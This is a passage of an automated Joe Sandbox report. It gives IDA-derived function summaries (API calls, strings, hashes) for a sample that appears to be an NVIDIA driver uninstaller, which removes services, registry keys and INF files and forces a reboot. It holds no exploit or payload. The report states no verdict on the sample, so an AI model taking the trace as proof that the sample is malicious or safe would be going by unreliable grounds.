                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Value$CloseQuery
                                  • String ID:
                                  • API String ID: 1795622825-0
                                  • Opcode ID: eeabe3a179ad5eb247ac1341b62379a93103b327b57e25b58015b749de6cda30
                                  • Instruction ID: 6988adeb8ac2533b70fb6cfacca3ac4754f181d7adc4493ca63fb5bc9538b572
                                  • Opcode Fuzzy Hash: eeabe3a179ad5eb247ac1341b62379a93103b327b57e25b58015b749de6cda30
                                  • Instruction Fuzzy Hash: 7F01A271E05219CBCB24CF59C8987A9F3B5FF44719F2086EAC919A66D1C7399A81CF20
                                  APIs
                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000004), ref: 02303D86
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 744a571f1614cd32f359986fa404c2eec9c4d52a60d8da876e6a335fadbae73e
                                  • Instruction ID: fa9c495fbb54186df08a34d50062355f747c8e1c548751c62480e19998481471
                                  • Opcode Fuzzy Hash: 744a571f1614cd32f359986fa404c2eec9c4d52a60d8da876e6a335fadbae73e
                                  • Instruction Fuzzy Hash: 7E01DAB19102289BDB24DB54CD9CBDAB7B8FB48704F0446C9E60EA6281D774ABC4CF60
                                  APIs
                                    • Part of subcall function 02300858: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 02300901
                                    • Part of subcall function 02300858: DeleteFileA.KERNEL32(?), ref: 0230092A
                                    • Part of subcall function 02300858: Sleep.KERNEL32(00000400), ref: 02300962
                                  • RtlExitUserThread.NTDLL(00000000), ref: 02300BF5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: File$CreateDeleteExitSleepThreadUser
                                  • String ID:
                                  • API String ID: 2529956594-0
                                  • Opcode ID: 9a141b47bdc44263919a4fc1fedd58b05c0055af5132100c3c8c4386ad3a66d5
                                  • Instruction ID: 2a6bb712d45f7f3c24a89e0b86e45d6a887bd79eb68e38a5269f87722919dd3d
                                  • Opcode Fuzzy Hash: 9a141b47bdc44263919a4fc1fedd58b05c0055af5132100c3c8c4386ad3a66d5
                                  • Instruction Fuzzy Hash: AAF0C8719401985FD712C758CC10BE6B7B9AF5D342F0044F9EB48D7340D6B05A848E65
                                  APIs
                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 02301305
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: ca70c905406c2ed91f7cf354e8b799c8ed2ec1ece052ae0ffea39194a179171e
                                  • Instruction ID: 8c524a58f7cf9b67c5f25bf5d0ef24fb43514d7a7a5eb9190e335ef135aca717
                                  • Opcode Fuzzy Hash: ca70c905406c2ed91f7cf354e8b799c8ed2ec1ece052ae0ffea39194a179171e
                                  • Instruction Fuzzy Hash: ECF037B9D40268CBDB20CFA8D84C7EEB774EB48325F0086D9E94993680C77499E1CF20
                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL(?,0047CB9D), ref: 0047CBFB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser
                                  • String ID:
                                  • API String ID: 6842923-0
                                  • Opcode ID: 7f4059fc3427da56b87920dd1e36bee461900e3af5d1567191a4cb147eee4303
                                  • Instruction ID: fa2ad403143e6f43346fab1eb1d6a247e4742fcdfda3f7b3aa17fccad5e66896
                                  • Opcode Fuzzy Hash: 7f4059fc3427da56b87920dd1e36bee461900e3af5d1567191a4cb147eee4303
                                  • Instruction Fuzzy Hash: CFD0A9F02006048FDF108F698988478BAE4EF89320F11457CE8CBEB320E7789C809B08
                                  APIs
                                  • RegCloseKey.KERNEL32(00000000), ref: 02303E6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 745d43be72e7235a85d2f5e153ea9174311f062101aa95a92e300ec3bec25edb
                                  • Instruction ID: 0f3361f8b72c567c4fcba981f11f86a57f8e2f11fa9aeeb0bb050be030fb11c6
                                  • Opcode Fuzzy Hash: 745d43be72e7235a85d2f5e153ea9174311f062101aa95a92e300ec3bec25edb
                                  • Instruction Fuzzy Hash: 68E0ECB6D00258CBCB20CB94D44979DF774E748321F1047A6DD1453290C7351990CE60
                                  APIs
                                  • RtlExitUserThread.NTDLL(00000000), ref: 02302618
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ExitThreadUser
                                  • String ID:
                                  • API String ID: 3424019298-0
                                  • Opcode ID: 33290f14dbeac9cd97e725652c2fc6779ec58a1eec305dc88e2e3e548e39726f
                                  • Instruction ID: 645e851f5d718d4d453271303dca4bebbc17c380ece7a11cd60d13793b2dd46b
                                  • Opcode Fuzzy Hash: 33290f14dbeac9cd97e725652c2fc6779ec58a1eec305dc88e2e3e548e39726f
                                  • Instruction Fuzzy Hash: 52D0C9B6E486198BC710CF99A8067AEF7B0FB49732F10477ADE25937C0D73114218AA1
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SetupDiSetSelectedDevice.SETUPAPI(?,?), ref: 0040A13E
                                  • _memset.LIBCMT ref: 0040A15C
                                  • SetupDiCallClassInstaller.SETUPAPI(00000005,?,?), ref: 0040A2D5
                                  • SetupDiRemoveDevice.SETUPAPI(?,?), ref: 0040A2E9
                                  • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,?,00000009,?,?,00000100,00000000), ref: 0040A17D
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  Strings
                                  • DelReg HKLM\System\CurrentControlSet\{DriverBaseRegPath}\{DriverPath}\Uninstall, xrefs: 0040A2C1
                                  • Win98, xrefs: 0040A297
                                  • Yes, xrefs: 0040A219, 0040A30B
                                  • Provider, xrefs: 0040A1AC, 0040A1BC
                                  • DriverPath, xrefs: 0040A188
                                  • GetReg InfFile=HKLM\System\CurrentControlSet\{DriverBaseRegPath}\{DriverPath}\InfPath, xrefs: 0040A194
                                  • After LeaveDriverStoreCache comparison., xrefs: 0040A344
                                  • Del {windir}\INF\OTHER\{InfFile}, xrefs: 0040A338
                                  • Del {windir}\INF\{InfFile}, xrefs: 0040A32C
                                  • UninstCommandClass::RemoveDeviceCallBack, xrefs: 0040A11F
                                  • DelReg HKLM\System\{*ControlSet}\{DriverBaseRegPath}\{DriverPath}, xrefs: 0040A2EF
                                  • RemoveDeviceStyle, xrefs: 0040A24B
                                  • Install ITB Driver, xrefs: 0040A209
                                  • Microsoft, xrefs: 0040A1C8
                                  • Win95, xrefs: 0040A279
                                  • LeaveDriverStoreCache defined, leaving INFs., xrefs: 0040A31D
                                  • Win9x, xrefs: 0040A25B
                                  • LeaveDriverStoreCache, xrefs: 0040A2FB
                                  • GetReg Provider=HKLM\System\CurrentControlSet\{DriverBaseRegPath}\{DriverPath}\ProviderName, xrefs: 0040A1A0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Setup$Device$Time_fputs$CallClassDebugFormatInstallerLocalMutexObjectOutputPropertyRegistryReleaseRemoveSelectedSingleStringWait__mbsicmp_l_fprintf_memset
                                  • String ID: After LeaveDriverStoreCache comparison.$Del {windir}\INF\OTHER\{InfFile}$Del {windir}\INF\{InfFile}$DelReg HKLM\System\CurrentControlSet\{DriverBaseRegPath}\{DriverPath}\Uninstall$DelReg HKLM\System\{*ControlSet}\{DriverBaseRegPath}\{DriverPath}$DriverPath$GetReg InfFile=HKLM\System\CurrentControlSet\{DriverBaseRegPath}\{DriverPath}\InfPath$GetReg Provider=HKLM\System\CurrentControlSet\{DriverBaseRegPath}\{DriverPath}\ProviderName$Install ITB Driver$LeaveDriverStoreCache$LeaveDriverStoreCache defined, leaving INFs.$Microsoft$Provider$RemoveDeviceStyle$UninstCommandClass::RemoveDeviceCallBack$Win95$Win98$Win9x$Yes
                                  • API String ID: 4216081165-2786948582
                                  • Opcode ID: 72c2f1619b11c8ba4319ca42973d496fd1f756b4d7114bf704437d102cf26e6f
                                  • Instruction ID: 8ec4b710010e4837ec26231cc4266aeb44bc9a34a6d4b71339fda3a8ed309083
                                  • Opcode Fuzzy Hash: 72c2f1619b11c8ba4319ca42973d496fd1f756b4d7114bf704437d102cf26e6f
                                  • Instruction Fuzzy Hash: 1551A8717443006BDA14EA318C53BAF7299AB88704F10083FB905B72C2EA7DF959869E
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • DeleteFileA.KERNEL32(?), ref: 0040A4CB
                                  • GetModuleFileNameA.KERNEL32(?,?,00000080,00000000), ref: 0040A58F
                                  • MessageBoxA.USER32(?,?,?,00040024), ref: 0040A6D3
                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 0040A6FD
                                    • Part of subcall function 00404870: PathIsDirectoryA.SHLWAPI(?), ref: 004048D3
                                  Strings
                                  Similarity
                                  • API ID: FileTime_fputs$DebugDeleteDirectoryExitFormatLocalMessageModuleMutexNameObjectOutputPathReleaseSingleStringWaitWindows_fprintf
                                  • String ID: Deleting file [%s]$Deleting file [%s] at reboot requires a reboot$Delreg {NVUninst_RegKey}$DirAndApply {sysdir}\nvu*.exe,del {Current File}$ForceNoReboot$LeaveBinaries$Leaving binaries requires a reboot$Rebooting machine...$SeShutdownPrivilege$Silent$Two Reboot Required$UninstCommandClass::~UninstCommandClass$UninstallFiles$User chose not to reboot machine$Yes$delreg HKLM\Software\NVIDIA Corporation\NForce$set Current File$set UninstallFiles={sysdir}\*.nvu
                                  • API String ID: 307492909-1273085944
                                  • Opcode ID: e49483de95836ca44b6822e51834490a9c4d192393757eb05fefdd314fe7567a
                                  • Instruction ID: 148bd0133d11efb3d4cd8e13bec66975ac6c737cb57313e90b9bc31bda8e2d43
                                  • Opcode Fuzzy Hash: e49483de95836ca44b6822e51834490a9c4d192393757eb05fefdd314fe7567a
                                  • Instruction Fuzzy Hash: 047126707007406BC724AB258C12BAF3795AF85308F14443EFC4AAB3C2EB7D9949879E
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetVersionExA.KERNEL32(00000000), ref: 0040544C
                                  • ImpersonateSelf.ADVAPI32(00000002), ref: 004054A9
                                  • GetCurrentThread.KERNEL32 ref: 004054B6
                                  • OpenThreadToken.ADVAPI32(00000000), ref: 004054BD
                                  • GetLastError.KERNEL32 ref: 004054C7
                                  • GetCurrentProcess.KERNEL32(00000008,?), ref: 004054DE
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004054E5
                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0040550D
                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 0040551F
                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00405535
                                  • GetLengthSid.ADVAPI32(?), ref: 00405547
                                  • LocalAlloc.KERNEL32(00000040,-00000010), ref: 00405555
                                  • InitializeAcl.ADVAPI32(00000000,-00000010,00000002), ref: 0040556C
                                  • AddAccessAllowedAce.ADVAPI32(00000000,00000002,00000003,?), ref: 00405583
                                  • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 00405597
                                  • SetSecurityDescriptorGroup.ADVAPI32(00000000,?,00000000), ref: 004055A8
                                  • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 004055B5
                                  • IsValidSecurityDescriptor.ADVAPI32(00000000), ref: 004055BC
                                  • AccessCheck.ADVAPI32(00000000,?,00000001,?,?,?,?,?), ref: 004055FD
                                  Strings
                                  • UninstCommandClass::NvHasAdminPrivileges, xrefs: 00405434
                                  Similarity
                                  • API ID: DescriptorSecurity$InitializeLocal$AccessAllocCurrentOpenProcessThreadTimeToken_fputs$AllocateAllowedCheckDaclDebugErrorFormatGroupImpersonateLastLengthMutexObjectOutputOwnerReleaseSelfSingleStringValidVersionWait_fprintf
                                  • String ID: UninstCommandClass::NvHasAdminPrivileges
                                  • API String ID: 3955854268-666976295
                                  • Opcode ID: 050a9d4dc1d7ade114df343f63b4597a0cc6678a38cd6c5da925e3614281e811
                                  • Instruction ID: 4a8bf63e1e1cdc5abac39afea6264b0c60d7c4f639c268e0c17247689c844e3c
                                  • Opcode Fuzzy Hash: 050a9d4dc1d7ade114df343f63b4597a0cc6678a38cd6c5da925e3614281e811
                                  • Instruction Fuzzy Hash: 436163B1A40348AFEB20DFA4DC49FEF7B78EB48700F44852AF515A62C1D7799904CB69
                                  APIs
                                  • DeleteFileA.KERNEL32(?), ref: 0040A4CB
                                  • GetModuleFileNameA.KERNEL32(?,?,00000080,00000000), ref: 0040A58F
                                    • Part of subcall function 00404870: PathIsDirectoryA.SHLWAPI(?), ref: 004048D3
                                  • MessageBoxA.USER32(?,?,?,00040024), ref: 0040A6D3
                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 0040A6FD
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  Strings
                                  Similarity
                                  • API ID: FileTime_fputs$DebugDeleteDirectoryExitFormatLocalMessageModuleMutexNameObjectOutputPathReleaseSingleStringWaitWindows_fprintf
                                  • String ID: Deleting file [%s] at reboot requires a reboot$Delreg {NVUninst_RegKey}$DirAndApply {sysdir}\nvu*.exe,del {Current File}$ForceNoReboot$LeaveBinaries$Leaving binaries requires a reboot$Rebooting machine...$SeShutdownPrivilege$Silent$Two Reboot Required$UninstallFiles$Yes$delreg HKLM\Software\NVIDIA Corporation\NForce$set Current File$set UninstallFiles={sysdir}\*.nvu
                                  • API String ID: 307492909-2329603694
                                  • Opcode ID: a27fceddfb19d90045bad796e34d44e3f8c07cd63adf6293f7ed7e5f8e49b961
                                  • Instruction ID: 155a2869753a8a445c7b2819d5c74154bf0e9286e24f00a05736786f3745b0ce
                                  • Opcode Fuzzy Hash: a27fceddfb19d90045bad796e34d44e3f8c07cd63adf6293f7ed7e5f8e49b961
                                  • Instruction Fuzzy Hash: 125105707407446BCA24AB218C12BAF33959F85308F14443EFD4A7B3C2EB7DA959879E
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040976F
                                  • _sprintf.LIBCMT ref: 004097B0
                                  • _sprintf.LIBCMT ref: 004097CB
                                  • FindFirstFileA.KERNEL32(?,?), ref: 004097E0
                                  • _printf.LIBCMT ref: 004097FA
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  • FindClose.KERNEL32(00000000), ref: 0040992C
                                  Strings
                                  Similarity
                                  • API ID: _sprintf$FindTime_fputs$CloseDebugDirectoryFileFirstFormatLocalMutexObjectOutputReleaseSingleStringWaitWindows_fprintf_printf
                                  • String ID: %s\%s$%s\OEM*.inf$CheckFile: invalid number of arguments$ERROR: INVALID_HANDLE_VALUE for %s$FALSE$UninstCommandClass::NvFindNvInfFiles$\Inf
                                  • API String ID: 583740959-2594375003
                                  • Opcode ID: a574571de57ab7fca1c87d16c58b534211c262a308238dd06ed7cf8478f441f1
                                  • Instruction ID: 34d2659e362f0414488eca2dba3c1efc15551cc0cd9f7abfc6c9da0d0c97be85
                                  • Opcode Fuzzy Hash: a574571de57ab7fca1c87d16c58b534211c262a308238dd06ed7cf8478f441f1
                                  • Instruction Fuzzy Hash: CF5197B2114740ABC320E765CC85EEF73A8ABC9704F44493EF559922C1EB78A509C79E
                                  APIs
                                  • DialogBoxParamA.USER32 ref: 004099CC
                                  • _memset.LIBCMT ref: 004099F4
                                  • _memset.LIBCMT ref: 00409A10
                                  • _memset.LIBCMT ref: 00409A2C
                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00409A41
                                  • _swprintf.LIBCMT ref: 00409A61
                                    • Part of subcall function 0040C0CC: __vsprintf_s_l.LIBCMT ref: 0040C0DF
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00409A7C
                                  • _strcpy_s.LIBCMT ref: 00409A95
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00409ACE
                                  • _swprintf.LIBCMT ref: 00409AF2
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00409B07
                                  • _strcpy_s.LIBCMT ref: 00409B20
                                  Strings
                                  • %s\NVIDIA Corporation\Uninstall\nvdisp.nvu, xrefs: 00409AE0
                                  • RunOnce {sysdir}\nvdisp.nvu, xrefs: 00409A83
                                  • %s\nvdisp.nvu, xrefs: 00409A4F
                                  • Executing:%s, xrefs: 00409AA2, 00409B2D
                                  • RunOnce {ProgramFilesDir}\NVIDIA Corporation\Uninstall\nvdisp.nvu, xrefs: 00409B0E
                                  Similarity
                                  • API ID: _memset$FileFindFirstTime_fputs_strcpy_s_swprintf$DebugDialogDirectoryFolderFormatLocalMutexObjectOutputParamPathReleaseSingleStringSystemWait__vsprintf_s_l_fprintf
                                  • String ID: %s\NVIDIA Corporation\Uninstall\nvdisp.nvu$%s\nvdisp.nvu$Executing:%s$RunOnce {ProgramFilesDir}\NVIDIA Corporation\Uninstall\nvdisp.nvu$RunOnce {sysdir}\nvdisp.nvu
                                  • API String ID: 389241729-3951643655
                                  • Opcode ID: 1512cae453351450d9df7129ba3eeb8a0c5e4637a9a315dc2af4de555c9c77ee
                                  • Instruction ID: deeff6242d78a93a4980a5e5794772c45f318a232c0138feb4e407eb11fae31c
                                  • Opcode Fuzzy Hash: 1512cae453351450d9df7129ba3eeb8a0c5e4637a9a315dc2af4de555c9c77ee
                                  • Instruction Fuzzy Hash: F731ABB1548744ABD230E7D4CC86FEF7398ABC4715F44492EF25C951C1EBB8524887AE
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 004056A6
                                  • SetLastError.KERNEL32(00000000), ref: 004056BB
                                  • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 004056CC
                                  • ControlService.ADVAPI32(00000000,00000001,?), ref: 004056E4
                                  • Sleep.KERNEL32(00000064), ref: 0040570C
                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00405714
                                  • Sleep.KERNEL32(000003E8), ref: 0040572A
                                  • DeleteService.ADVAPI32(00000000), ref: 00405755
                                  • GetLastError.KERNEL32 ref: 0040575F
                                  • Sleep.KERNEL32(000003E8), ref: 00405775
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00405780
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00405787
                                  • GetLastError.KERNEL32 ref: 0040579A
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 004057B0
                                  Strings
                                  Similarity
                                  • API ID: Service$CloseErrorHandleLastSleep$OpenTime_fputs$ControlDebugDeleteFormatLocalManagerMutexObjectOutputQueryReleaseSingleStatusStringWait_fprintf
                                  • String ID: Error:$UninstCommandClass::UninstallService
                                  • API String ID: 3903441159-1355178088
                                  • Opcode ID: a37372994804237c97677104cca8dec83b1fabc7a210dcb473d58f23ee358677
                                  • Instruction ID: 84ba716b5870d943fc6418dcc241205f01b0433f286f4047e0984ca98f73e66c
                                  • Opcode Fuzzy Hash: a37372994804237c97677104cca8dec83b1fabc7a210dcb473d58f23ee358677
                                  • Instruction Fuzzy Hash: 2731C775200700EBD210AF25DC849AFBBA8EFD8355F00843EFA5593391D77889449FAA
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
